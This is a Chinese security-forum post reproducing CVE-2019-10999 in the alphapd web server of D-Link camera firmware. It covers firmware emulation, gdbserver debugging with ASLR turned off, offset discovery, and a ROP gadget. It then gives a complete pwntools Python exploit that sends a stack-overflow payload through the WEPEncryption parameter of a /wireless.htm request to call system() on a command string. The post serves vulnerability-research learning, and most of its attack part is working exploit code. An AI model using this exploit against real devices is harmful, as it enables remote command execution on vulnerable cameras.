CVE-2019-10999复现学习

本文为看雪论坛精华文章
看雪论坛作者ID:Catsay
固件仿真
mount -o bind /dev/ ./dev/
mount -t proc /proc/ ./proc



killall -q alphapd
sleep 1
alphapd &







./gdbserver-mipsel :23946 ./bin/alphapd



调试
关闭aslr:echo 0 > /proc/sys/kernel/randomize_va_space
./gdbserver-mipsel :23946 --attach alphapdPID
set arch mips
set endian little
target remote 192.168.50.214:40496
挖掘漏洞






> cyclic -l 0x6161616b
40
Libc基地址

Rop
.text:0004A604 addiu $s2, $sp, 0x1E8+var_F8
.text:0004A608 move $a0, $s2
.text:0004A60C move $t9, $s0
.text:0004A610 jalr $t9 ; sub_49DF0
import socket
from pwn import *
context.log_level = 'debug'
context.arch = "mips"
Libc_Addr = 0x77eda000
system_Addr = 0x0045080
cmd = "echo${IFS}'Pwn!'"
gadget = 0x004A608
payload = cyclic(16).upper()
payload += p32(Libc_Addr+system_Addr) # S0
# p -> 0x77F24604
payload += 'BBBB' # S1
payload += p32(0x7fffe2a8) # S2
payload += 'DDDD' # S3
payload += 'EEEE'
payload += 'FFFF'
payload += p32(Libc_Addr+gadget) # PC
payload += 'HHHH'
payload += cmd
if __name__ == '__main__':
#key = "Content-Type:text/html;charset:utf-8\r\n"
RHOST = '127.0.0.1'
RPORT = 40080
request = ""
request+= "GET /wireless.htm?WEPEncryption={} HTTP/1.1\r\n".format(payload)
request+= "Host: {}:{}\r\n".format(RHOST,str(RPORT))
request+= "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0"
request+= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
request+= "Accept-Language: en-US,en;q=0.5"
request+= "Accept-Encoding: gzip, deflate"
request+= "Connection: close"
request+= "Upgrade-Insecure-Requests: 1"
request+= "\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((RHOST,RPORT))
s.send(request)
print(request)
# msg = s.recv(1024)
s.close()
# print msg

看雪ID:Catsay
https://bbs.pediy.com/user-home-642281.htm

# 往期推荐
1.内核漏洞学习-HEVD-UninitializedStackVariable
3.内核漏洞学习-HEVD-NullPointerDereference


球分享

球点赞

球在看

点击“阅读原文”,了解更多!
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
- 谷歌正在为安卓密码管理器提供通行密钥Passkey迁移 支持将密钥导入到新设备
- 小红书回应高频读取用户信息:无授权不会读取
- ChatGPT Crawler漏洞:通过HTTP请求进行DDOS攻击
- 微软计划为新版Outlook添加PST离线数据文件支持
- ToolJet几分钟搞定一个网站,这个低代码开发平台爱了!
- supercopy存在恶意代码 影响60W Chrome用户
- Firefly-SRC资产探测平台使用手册
- Resellerclub如何PUSH域名?
- 微软想通了?Windows 11恢复一键改变默认浏览器功能
- 诸子云·分享汇 | 第五周直播实录
- 做程序员要有“疯子精神”,中国开源开放的科创人才要如何培养?
- 免费的SSL证书管用吗?免费和收费的区别是什么?
赞助链接